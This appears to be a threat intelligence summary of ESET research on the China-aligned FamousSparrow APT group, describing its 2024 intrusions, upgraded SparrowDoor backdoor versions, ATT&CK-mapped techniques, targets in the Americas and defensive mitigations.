Full Report
ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor
Analysis Summary
# Threat Actor: FamousSparrow
## Attribution & Identity
China-aligned APT group, active since at least 2019. Microsoft Threat Intelligence links them to the threat actor Salt Typhoon, though the reporting organization (ESET) is still investigating the nature and extent of the link, noting that some TTPs overlap with Earth Estries. FamousSparrow is the only known user of the SparrowDoor backdoor.
## Activity Summary
The group was thought to be inactive publicly since 2022, but ESET discovered recent activity in July 2024 when they compromised a trade group in the US financial sector. A few days prior to the US compromise, they breached a research institute in Mexico. They were also observed targeting a governmental institution in Honduras between 2022 and 2024. The recent activity showcased developed toolsets, including two previously undocumented versions of their flagship backdoor, SparrowDoor.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** The group has previously been documented exploiting the ProxyLogon vulnerability (2021).
- **Persistence/Defense Evasion:** Deploying newly developed, upgraded versions of the SparrowDoor backdoor.
- New SparrowDoor versions feature improved code quality and architecture, including command parallelization.
- Loaders share code overlaps with previous FamousSparrow samples and use the same reflective loader shellcode as the NCSC-described `libhost.dll` sample from February 2022.
- Configuration format shares similarities with older versions, but the encryption key is hardcoded in the loader and backdoor.
- XOR encryption has been replaced with RC4 encryption in the modular SparrowDoor version.
- **Lateral Movement:** Used remote PowerShell sessions to pivot onto other machines. [T1021]
- **Collection:** SparrowDoor capabilities include reading files from local system drives, mapped removable media, and mapped network shared drives. [T1005], [T1025], [T1039]
- **Command and Control (C2):**
- C&C communications use a format similar to previous SparrowDoor versions.
- Uses raw TCP sockets for communication [T1095].
- Downloads additional files via HTTP [T1071.001].
- Modular SparrowDoor uses RC4 symmetric encryption for network data [T1573.001].
- Configured with up to three fallback C&C servers [T1008].
- Downloaded PowerHub over HTTP on port 8080 and HTTPS on port 8443 [T1571].
- **Exfiltration:**
- Exfiltrates data over the same raw TCP socket used for C2 communication [T1041].
- Splits file content into 4 kB chunks [T1030].
- Capable of automated exfiltration of any requested file content [T1020].
- **Tool Usage:** Observed using the privately sold ShadowPad backdoor for the first time in this campaign.
## Targeting
- **Sectors:** Financial sector, research institutes, governmental institutions.
- **Geography:** United States, Mexico, Honduras.
- **Victims:** A trade group operating in the US financial sector; a research institute in Mexico; a governmental institution in Honduras. Previously targeted hotels, international organizations, engineering companies, and law firms.
## Tools & Infrastructure
- **Malware families used:**
- SparrowDoor (two undocumented, upgraded versions discovered, one modular).
- ShadowPad (observed for the first time being used by this actor).
- PowerHub (downloaded during the campaign).
- **Infrastructure (C2, domains, IPs - defang URLs):** C2 communication formats are similar to previous versions, using raw TCP sockets. Specific infrastructure details were not provided apart from the ports used for initial download (8080/8443).
## Implications
FamousSparrow appears to be actively developing sophisticated capabilities, demonstrated by the significant architectural upgrades in the new SparrowDoor versions, challenging previous assumptions that the group was dormant. Their first-time use of ShadowPad suggests access to high-end, privately sold espionage tools, potentially indicating increased resource backing or broader CNO alignment. Their targeting profile remains focused on sensitive economic and governmental entities in the Americas.
## Mitigations
- Monitor for the deployment of new or existing versions of the SparrowDoor backdoor, paying attention to unique configuration formats and RC4 encryption usage.
- Review network traffic for C2 communications utilizing raw TCP sockets or HTTP/HTTPS on non-standard ports (e.g., 8080, 8443).
- Implement strong network segmentation and strictly control lateral movement, as the actor utilizes remote PowerShell sessions.
- Ensure timely patching for vulnerabilities like ProxyLogon, historically used for initial access.